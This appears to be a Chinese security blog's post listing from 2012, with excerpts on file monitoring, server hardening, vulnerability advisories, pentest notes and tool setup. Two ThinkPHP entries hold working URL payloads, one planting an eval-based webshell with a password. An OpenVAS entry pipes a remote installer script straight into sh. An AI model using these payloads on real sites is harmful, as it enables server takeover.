自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

cnbird's blog

cnbird's blog

  • 博客(43)
  • 资源 (2)
  • 收藏
  • 关注

转载 Web服务器文件监控平台-Falcon

Web服务器文件监控平台-Falcon如何安装并且开始监控:第一步,解压并检查程序编译环境tar -zxvf falcon.tar.gzcd Release/./check.sh看到以下信息证明程序编译环境准备就绪Found inotify success!Found mysql-dev environment success!第二步,安装Falcon控制中心

2012-05-31 10:39:47 1246

转载 文件防篡改脚本,一有文件被修改,立即发送报警短信

#!/bin/bash#description: check files shell#author:coralzd powered by www.freebsdsystem.orgcheckdir=/data/www/bbs.xxx.comipadd=`ifconfig |grep "inet" |cut -c 0-36|sed -e 's/[a-zA-Z: ]//g' |grep

2012-05-31 10:37:26 2676

转载 boblog任意变量覆盖漏洞(二)

boblog任意变量覆盖漏洞(二)by Ryat[puretot]mail: puretot at gmail dot comteam: http://www.80vul.comdate: 2011-03-09先前80vul.com上公布了一个bo-blog的漏洞[1],这个漏洞已经被官方修补,但随后wooyun.com上公布了一个绕过补丁的方法[2],可惜触发时有一定的限制,

2012-05-30 10:33:51 1076

转载 利用 PHP 扩展模块突破 Disable_functions 执行命令

原文地址:http://hi.baidu.com/netxfly/blog/item/a2c7bb0ea8f764ed37d1227a.html前言Php 是一种功能强大且应用非常广泛的脚本语言,Internet 中很多的网站都 是通过 php 架构的。使用 php 自带的 system,exec,passthru,shell_exec, proc_open 函数可直接执行系统命令,给服务

2012-05-29 14:17:23 3429

转载 From LOW to PWNED [11] Honorable Mention: Open NFS

Open NFS mounts/shares are awesome.  talk about sometimes finding "The Goods".  More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions.  so

2012-05-29 14:10:44 813

转载 Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof

#!/usr/bin/python   # Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept# Exploit requires no authentication, /tmp/networkScript

2012-05-27 19:21:09 814

转载 配置Apache防止webshell上传

在Linux服务器的web应用中,经常需要上传文件到服务器上。不管是php的也好,jsp的也好,如果web程序对于上传检查不严格,可导致黑客上传webshell,对服务器安全威胁自不用说了。对于web开发对文件上传的限制,这里就不说了,这里仅仅来讨论服务器如何设置才防止上传的webshell执行。记得以前写过一篇文章,针对Windows下web目录的设置,脚本可以执行的仅仅给web匿名

2012-05-25 11:38:26 1605

原创 Hash injection Attacks in a Windows Network

又是转载的,没啥含量,呵呵。 aka  Why an exposed LM/NTLM Hash is comparable to a clear-text password  aka Why a 127 character long password is not necessarily stronger than a 4 character long password a

2012-05-24 13:44:14 1054

转载 Anti-fingerprinting techniques

Hello everybody!I just released the slides of a course about anti-fingerprintingtechniques. The course talking about:– A brief introduction of FreeBSD.– How fingerprinting works.– How defeat the finge

2012-05-24 11:20:14 1080

转载 Vulnerability Assessment - Information Assurance Tools Report

This Report focuses on vulnerability assessment tools, which this Report defines as: automated tools the primary purpose of which is to: - Proactively detect vulnerabilities in elements of deplo

2012-05-24 11:17:15 725

转载 MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege

Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032  Possible MS12-032 Proof of concept from StackOverflow thx to @avivra   We discovered that running ou

2012-05-24 11:16:39 867

转载 Web Application Penetration testing with Google Chrome Browser

Just found some interesting and useful extensions that can help many of us when we are doing an penetration test...XSS RaysComplete XSS reversing/scanner tool. Find how a site is filtering cod

2012-05-24 11:15:35 1039

转载 域安全通道和信任关系-- Nltest.exe

文章来自 http://hi.baidu.com/kerving/blog/item/de133cd27263633a970a16fd.htmlSample Output Obtained by Typing "NLTEST.EXE" Without the QuotesC:\NTRESKIT>nltestUsage: nltest [/OPTIONS]/SERVER: - Spe

2012-05-24 11:14:37 3625

转载 HULK vs. THOR - Application DoS Smackdown

http://blog.spiderlabs.com/2012/05/hulk-vs-thor-application-dos-smackdown.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SpiderlabsAnterior+%28SpiderLabs+Anterior%29&utm_content=Googl

2012-05-24 11:10:48 1358

转载 Oracle限制某个数据库帐号只能在特定机器上连入数据库

通过Oracle数据库的触发器实现,例如:TEST为测试账号、绑定的IP为:10.142.244.30CREATE OR REPLACE TRIGGER sys.trg_work_log AFTER LOGON ON DATABASEdeclarev_program_name varchar2(200);v_username varchar2(100);v_ip varch

2012-05-24 11:07:23 1079

转载 From LOW to PWNED [6] SharePoint

Post [6] SharePointMisconfigured SharePoint  can be *really* useful. Examples of things you can do with it are:User/Domain EnumerationAccess to useful filesRegular / Auth Protected SharePoin

2012-05-23 11:01:57 843

转载 From LOW to PWNED [8] Honorable Mention: Log File Injection

So this didn't make it into the talk, but was in the hidden slides...not positive this is a "low" but a friend suggested it, so here you go.Goes like this:Request gets loggedSomething mali

2012-05-23 10:41:57 699

转载 From LOW to PWNED [10] Honorable Mention: FCKeditor

FCKeditor is bundled with seems-like everything (ColdFusion, Drupal plugins, WordPress plugins, other random CMSs) and has probably been responsible for countless hacks via file upload issues.Exam

2012-05-23 10:41:16 863

转载 Securing Development with PMD

Back in April I presented my Securing Development with PMD (Teaching an Old Dog New Tricks) presentation at OWASP AppSec DC. The main idea was to demonstrate how security can be integrated into develo

2012-05-23 10:36:42 639

原创 peoplesoft 注入

Preventing SQL InjectionThe following functions and methods provide a way for SQL to be submitted to the database; they are, therefore, subject to SQL injection vulnerabilities:SQLExec funct

2012-05-21 14:59:52 1034

转载 Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability

http://www.wooyun.org/bugs/wooyun-2010-05526Joomla! 1.6.x/1.7.x/2.5.0-2.5.2 suffers from a privilege escalation vulnerability that allows users to be registered into any group not having 'core.admin

2012-05-18 15:38:31 1270

原创 cenos 安装openvas

wget -q -O - http://www.atomicorp.com/installers/atomic | shyum install -y openvas* https://wiki.archlinux.org/index.php/OpenVAS

2012-05-16 11:08:38 1689 1

转载 BackTrack5漏洞评估之OpenVAS(Open Vulnerability Assessment System)

OpenVAS (Open Vulnerability Assessment System)是一个包含集成安全工具和服务的系统,为漏洞管理提供了强大的平台,其开发基于C/S架构,通过客户端向服务端请求对目标的具体网络漏洞执行测试集。模块化和稳定的设计使该平台支持并行安全测试的同时支持多操作系统( Linux/Win32)。OpenVAS核心组件和功能。  1、OpenVAS Sca

2012-05-16 10:42:47 4834 1

转载 thinkphp任意代码执行漏洞

http://site.com/index.php/module/action/param1/${@phpinfo()}直接拿SHELLindex.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c

2012-05-16 09:48:06 9935 2

转载 CERT Triage Tools

http://www.cert.org/vuls/discovery/triage.html

2012-05-16 09:47:06 613

转载 linux privileged and arbitrary chdir() (fixed at 5.4 cifs release)

########## Blueliv Advisory 2012-004 ##########- Discovered by: Jesus Olmos Gonzalez at Blueliv- Risk: 5/5- Impact: 1/5###############################################1. VULNERABILITY----

2012-05-16 09:46:30 913

转载 NGS00138 Technical Advisory: Websense Triton 7.6 - authentication bypass in report management UI

=======Summary=======Name: Websense (Triton 7.6) Authentication-bypass in report management UI Release Date: 30 April 2012Reference: NGS00138Discoverer: Ben Williams Vendor: WebsenseVe

2012-05-16 09:43:59 768

转载 NGS00140 Technical Advisory: Websense Triton 7.6 - unauthenticated remote command execution as SYSTE

=======Summary=======Name: Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM Release Date: 30 April 2012Reference: NGS00140Discoverer: Ben Williams Vendor: Websens

2012-05-16 09:43:04 826

转载 误删Oracle数据文件的恢复方法

今天尝试了一下,在Linux下删除一个数据文件,然后进行回复。环境:数据库在Open的状态,然后rm -rf users.dbf (删除users表空间),最后找回users.dbf文件。在回复的时候,回复的方法跟数据库的版本关系不大(因为是物理文件),只是跟操作系统有一定的关系,如:Red hat Linux  , Solaris Linux 等等。下面进行演示:

2012-05-16 09:39:25 1301

转载 测试两台服务器之间的网络带宽

一、为什么选择了iperf 之前做了一个项目,说要测试两台服务器之间的带宽,本想通过拷贝来进行测试,后来客户觉得得出的数据没有说服性,于是改拿工具来进行测试。我们这回用的工具名字叫iperf。iperf它是一款网络性能测试的工具,分为多个版本:Linux版、UNIX版、Windows版。相比之下,Windows版更新的比较慢,而UNIX和Linux版本更新起来更快,现在最新

2012-05-16 09:38:12 26817

转载 Bypassing HTTP Basic Authentication in PHP Applications

Basic authentication doesn’t workUsing HTTP basic authentication to protect backends or adminitrative panels is a bad idea. Of course, setting up HTTP Basic auth for the web server you live most

2012-05-15 09:47:24 1859

转载 From LOW to PWNED [3] JBoss/Tomcat server-status

http://carnal0wnage.attackresearch.com/2012/04/from-low-to-pwned-3-jbosstomcat-server.htmlSeveral (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.The s

2012-05-15 09:43:55 1105

转载 Understanding Ajax vulnerabilities

http://www.ibm.com/developerworks/web/library/wa-vulnerabilities/index.html?ca=drs-

2012-05-15 09:40:53 533

转载 It Takes Two to Tango (myself, and your unprotected file share)

BananaStand learned from last time (to see last time, go here). Systems were patched, ACL's were locked down, SIEM was tuned, and the security team got a new coffee pot just to help keep them on edg

2012-05-15 09:38:24 953

原创 database scanner

http://www.dbappsecurity.com/dbscan.htmlhttp://www.imperva.com/products/dle_downloads-and-evaluations-overview.htmlhttp://www.ngssecure.com/services/information-security-software/ngs-squirrel-for-

2012-05-13 09:10:05 1004

转载 informix sybase数据库下载地址

https://www14.software.ibm.com/webapp/iwm/web/reg/pick.do?source=ifxids&S_TACT=109HF16W&S_CMP=dwchina&lang=zh_CNhttp://www.sybase.com/downloads

2012-05-12 19:50:57 1688

转载 nessus 购买地址

https://store.tenable.com/https://store.tenable.com/index.php?main_page=index&cPath=1&sort=20a&action=buy_now&products_id=7&__utma=116221209.1478096127.1336825171.1336825171.1336825171.1&__utmb=11

2012-05-12 19:16:53 1380

转载 informix pentest

http://www.databasesecurity.com/informix/DatabaseHackersHandbook-AttackingInformix.pdf

2012-05-09 14:41:14 586

转载 连续IP生成器

#!/bin/shfor i in `seq -f "172.16.40.%g" 3 26`doecho $idone

2012-05-08 21:21:53 843

转载 thinkphp remote exploit

lib/ThinkPHP/Vendor//Vendor/module/action/param1/$%7B@print(phpinfo())%7D

2012-05-08 12:51:44 1332

附件2 金融行业信息系统信息安全等级保护测评指南(报批稿)

附件2 金融行业信息系统信息安全等级保护测评指南(报批稿)

2013-06-21

ISO 27000中文系列

ISO 27000中文系列主要是包括iso 27001 ISO 27002实施指南 iso 27003风险评估指南

2010-07-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除